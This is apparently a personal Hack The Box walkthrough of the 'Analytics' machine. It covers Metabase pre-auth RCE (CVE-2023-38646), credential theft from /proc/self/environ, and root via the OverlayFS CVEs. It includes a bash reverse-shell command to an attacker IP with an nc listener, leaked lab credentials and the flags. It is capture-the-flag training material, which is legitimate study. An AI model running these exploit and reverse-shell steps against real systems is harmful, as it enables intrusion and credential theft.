---
Title: Analytics HTB Machine
Year: "2023"
Difficulty: Easy
share: "true"
---

- [[#Reconnaissance|Reconnaissance]]
- [[#Weaponisation|Weaponisation]]
- [[#Delivery|Delivery]]
- [[#Exploitation|Exploitation]]
- [[#Actions on Objective|Actions on Objective]]

## Reconnaissance

- Conducted an NMAP Scan which seemed to take for ever so I killed it initially. 
- I found through probing that the following ports were active
	- 80
	- 22
	- 3000

- Browsed to the website which attempted to redirect to analytical.htb so I added that to /etc/hosts
- Nothing too exciting on the page except the for Login link. This redirects to http://data.analytical.htb so I added that to /etc/hosts and browsed to that. 
- A vhost search using Gobuster confirmed the presence of this subdomain
	- `gobuster vhost -u http://analytical.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain --timeout 20s`

![[Screenshot 2023-12-12 at 5.27.46 pm.png|Screenshot 2023-12-12 at 5.27.46 pm.png]]

- This brings up a login page for something called Metabase.
- I tried some quick SQLi checks to see if there was something simple like that but they didn't work.
![[Screenshot 2023-12-12 at 5.22.04 pm.png|Screenshot 2023-12-12 at 5.22.04 pm.png]]

- I fired up Burpsuite to take a deeper look at whats going on. 
- Taking a look at the Response from /auth/login down the bottom I find a Date and a Version Number. 
	- Date: 2023-06-29
	- Version: 0.46.6
	- Branch: Release-x.46.x
-
![[Screenshot 2023-12-12 at 5.30.01 pm.png|Screenshot 2023-12-12 at 5.30.01 pm.png]]
## Weaponisation

- I punch this information into Google and it reveals that there is a CVE listed against this product and this version
	- CVE-2023-38646
	- This is an RCE and allows for the execution of code prior to authentication
- There were a couple of PoC's and the first one I tried didn't work. However, the one I found at the following repo worked like a charm. 
	- https://github.com/Pyr0sec/CVE-2023-38646
- For this i needed the Setup-Token from Metabase. This can be found in the /api/session/properties end point
- A quick search of this endpoint in Burp turned that up
	- `249fa03d-fd94-4d5b-b94f-b4ebf3df681f`
![[Screenshot 2023-12-12 at 5.35.16 pm.png|Screenshot 2023-12-12 at 5.35.16 pm.png]]
## Delivery

- With that information I launched a listener
	- `nc -lvnp 4242`
- Then launched the exploit with the following command
	- `python3 exploit.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "bash -i >& /dev/tcp/10.10.14.179/4242 0>&1"`
- The exploit reports that it has sent the payload and you receive an Response. I initially thought it had failed but when I went over to my listener I was in.
![[Screenshot 2023-12-12 at 5.41.13 pm.png|Screenshot 2023-12-12 at 5.41.13 pm.png]]
## Exploitation

- Before we go any further I need to upgrade the shell to something more useable. My usual method of using Python to break out of the pseudo shell didn't work. Python doesn't seem to be present. 
- The script program wasn't available either. This feels like a more secure linux variant. 
- So I checked /etc/os-release and it's Alpine Linux Version 3.18
- Pulling the /etc/passwd file didn't reveal any normal users except metabase. However, it did show a user squid, vpopmail and cyrus all pointing to /sbin/nologin
- Metabase is a user with a shell and so if I can compromise it's password I'll have better access
- I found what looks like a start script (start_metabase.sh) for metabase in /app and looking through it, it refers to some environmental variables that could contain credentials. 
- What I couldn't workout was where to find those. 
- After some research I had to fall back to a walkthrough to get pointed in the right direction, and it turns out I was on the right path I just needed to find the right file. 
- The file I was looking for was /proc/self/environ
- It's contents are as follows:

```
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=8fe80d2d640c
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/metabase.db
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=4
MB_DB_USER=FC_LANG=enUS
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../libLC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7_=/bin/catOLDPWD=/8fe80d2d640c:/metabase.db
```
- So I've got some credentials for Metabase
	- Username: metalytics
	- Password: An4lytics_ds20223#
- Metabase requires an email to login so I took a punt and used metalytics@analytical.htb and it worked. I looked through the app and there was nothing of interest.
- I tried to SSH into 10.10.11.233 with the metabase username and the password recovered but that didn't work.
- Something that I hadn't come up against before are docker containers. When I gained a psuedo shell it was into the Docker Container not the host machine. So that's why I was struggling to find any useful information. 
- It is also why when I tried the password recovered with the metabase user that I had from the passwd file it didn't work. But when I tried metalytics I was able to ssh into the machine.
- But instead of hitting the docker container I hit the host.

![[Screenshot 2023-12-12 at 8.43.43 pm.png|Screenshot 2023-12-12 at 8.43.43 pm.png]]
## Actions on Objective

- I recovered the user flag
	- `3b97409bd01e67acd5fa17494ff4bc7a`
- Now time to get root. 
- This user doesn't have sudo access
- The OS is Ubuntu 22.04.03 LTS
- I was able to gain root access using a vulnerability in the binary runC however, because it is a rootless container it was very limited and I couldn't get access to anything.
- So I went back to the drawing board. I ran linPEAS to see if it turned anything up and there wasn't anything really useful. 
- So I took a look at the kernel to see if we can target that. 
- The system information is as follows:

```
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy

Kernel: 6.2.0-25-generic
```

- With some googling we turn up the following CVE's
	- CVE-2023-2640
	- CVE-2023-32629
- Both of these CVE's are related to the OverlayFS in certain Ubuntu Versions

| Kernel version | Ubuntu release                                                    |
| -------------- | ----------------------------------------------------------------- |
| 6.2.0          | Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish) |
| 5.19.0         | Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)  |
| 5.4.0               |                    Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)                                               |

- I found a PoC at https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
- Ran it on target machine
	- `./exploit.sh`
- It worked and we now have Root Access
![[Screenshot 2023-12-13 at 5.12.11 pm.png|Screenshot 2023-12-13 at 5.12.11 pm.png]]
- Recovered the Root Flag
	- `e33694b78372b64246889e2dbe5467b5`

